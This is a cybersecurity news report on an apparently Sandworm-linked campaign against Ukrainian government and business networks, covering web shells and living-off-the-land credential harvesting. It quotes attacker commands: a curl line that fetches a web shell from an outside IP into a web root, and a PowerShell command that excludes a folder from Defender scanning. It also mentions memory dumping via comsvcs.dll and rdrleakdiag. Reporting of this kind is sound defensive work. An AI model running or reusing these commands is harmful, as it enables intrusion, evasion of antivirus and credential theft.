Russian Hackers Employ Stealthy Tactics to Infiltrate Government Networks
Ukrainian government organizations are facing persistent cyber threats from Russian-backed actors employing sophisticated evasion techniques to maintain prolonged access to critical networks. Recent investigations have revealed coordinated campaigns targeting essential infrastructure and government entities, with attackers deploying advanced methods that circumvent traditional security defenses.
These operations signify a strategic shift in cyberattack methodologies, focusing on credential harvesting and sensitive information extraction rather than immediate destructive actions. This approach allows threat actors to conduct extensive reconnaissance and maintain a covert presence within networks for extended periods.
Analysts have identified two significant intrusion incidents: a two-month operation against a large business services organization and a week-long campaign targeting local government infrastructure. The attackers exhibit exceptional operational security awareness, minimizing malware deployment and primarily relying on legitimate Windows administration tools and dual-use utilities to evade detection.
The campaign appears linked to Sandworm, a Russian military intelligence unit under the GRU, known for destructive attacks against critical infrastructure, including power grids and satellite communications networks.
Initial Compromise and Persistence Mechanisms
The initial compromise occurred through the deployment of web shells on public-facing servers, likely exploiting unpatched vulnerabilities. Attackers utilized the Localolive web shell to establish persistent backdoor access, enabling remote command execution capabilities.
Living-Off-the-Land Credential Harvesting Techniques
Upon gaining initial access on June 27, 2025, attackers executed reconnaissance commands using built-in Windows utilities:
“`
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads
“`
The attackers deliberately disabled Windows Defender scanning on the Downloads folder, requiring administrative privileges. They subsequently created scheduled tasks executing every thirty minutes using legitimate rundll32.exe with comsvcs.dll to perform memory dumps, extracting credentials stored in process memory.
The threat actors specifically targeted KeePass password vault processes through enumeration commands, demonstrating precise targeting of credential repositories.
Advanced evasion continued through the utilization of the Windows Resource Leak Diagnostic tool (rdrleakdiag) for memory dumping operations, a seldom-used technique designed to evade security monitoring systems.
Registry hive exfiltration through native reg.exe commands enabled additional credential and configuration data extraction.
This campaign showcases threat actors prioritizing stealth over speed, employing legitimate administration tools to maintain attribution ambiguity while systematically harvesting sensitive organizational data throughout extended network access periods.
